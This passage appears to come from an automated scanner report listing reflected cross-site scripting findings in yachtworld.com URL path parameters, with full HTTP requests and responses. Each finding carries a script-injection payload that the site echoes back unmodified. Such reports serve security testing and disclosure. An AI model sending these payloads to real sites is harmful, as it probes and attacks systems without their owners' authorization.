Set-Cookie: VIEWED_BOATS_STORE=2300541%5B%25%5D32%27+Regulator+32+FS%5B%25%5DEUR%26nbsp%3B180%2C000%5B%25%5DSardegna+centro+orientale%2C+Italy%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F0%2F5%2F2300541_1_mini.jpg%3F1294838885000%5B%25%5D%2Fboats%2F2009%2FRegulator-32-FS-2300541%2FSardegna-centro-orientale%2FItaly%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:25 GMT
Set-Cookie: VIEWED_BOATS_STORE=2300541%5B%25%5D32%27+Regulator+32+FS%5B%25%5DEUR%26nbsp%3B180%2C000%5B%25%5DSardegna+centro+orientale%2C+Italy%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F0%2F5%2F2300541_1_mini.jpg%3F1294838885000%5B%25%5D%2Fboats%2F2009%2FRegulator-32-FS-2300541%2FSardegna-centro-orientale%2FItaly%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&8cf47"><script>alert(1)</script>a585151a92c=1&units=Feet&seo=0&checked_boats=2300541&boat_id=2300541&back=/core/boats/2009/Regulator-32-Fs-2300541/Sardegna-centro-orientale/Italy&boat_id=2300541">
...[SNIP]...

3.172. http://www.yachtworld.com/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfba7"><script>alert(1)</script>dc9683fc492 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2010/Regulator-32fs-Center-Console-2293873/Brickdfba7"><script>alert(1)</script>dc9683fc492/NJ/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:30 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 10 Dec 2010 20:05:25 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2293873%5B%25%5D32%27+Regulator+32FS+Center+Console%5B%25%5DUSD%26nbsp%3B219%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F3%2F8%2F2293873_1_mini.jpg%3F1292001735000%5B%25%5D%2Fboats%2F2010%2FRegulator-32FS-Center-Console-2293873%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:30 GMT
Set-Cookie: VIEWED_BOATS_STORE=2293873%5B%25%5D32%27+Regulator+32FS+Center+Console%5B%25%5DUSD%26nbsp%3B219%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F3%2F8%2F2293873_1_mini.jpg%3F1292001735000%5B%25%5D%2Fboats%2F2010%2FRegulator-32FS-Center-Console-2293873%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2293873&boat_id=2293873&back=/core/boats/2010/Regulator-32fs-Center-Console-2293873/Brickdfba7"><script>alert(1)</script>dc9683fc492/NJ/United-States&boat_id=2293873">
...[SNIP]...

3.173. http://www.yachtworld.com/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b018"><script>alert(1)</script>79d1909b0a2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ2b018"><script>alert(1)</script>79d1909b0a2/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:05:02 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 10 Dec 2010 20:05:25 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2293873%5B%25%5D32%27+Regulator+32FS+Center+Console%5B%25%5DUSD%26nbsp%3B219%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F3%2F8%2F2293873_1_mini.jpg%3F1292001735000%5B%25%5D%2Fboats%2F2010%2FRegulator-32FS-Center-Console-2293873%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:05:02 GMT
Set-Cookie: VIEWED_BOATS_STORE=2293873%5B%25%5D32%27+Regulator+32FS+Center+Console%5B%25%5DUSD%26nbsp%3B219%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F3%2F8%2F2293873_1_mini.jpg%3F1292001735000%5B%25%5D%2Fboats%2F2010%2FRegulator-32FS-Center-Console-2293873%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2293873&boat_id=2293873&back=/core/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ2b018"><script>alert(1)</script>79d1909b0a2/United-States&boat_id=2293873">
...[SNIP]...

3.174. http://www.yachtworld.com/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bd1b"><script>alert(1)</script>5fb880b10f1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States4bd1b"><script>alert(1)</script>5fb880b10f1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; 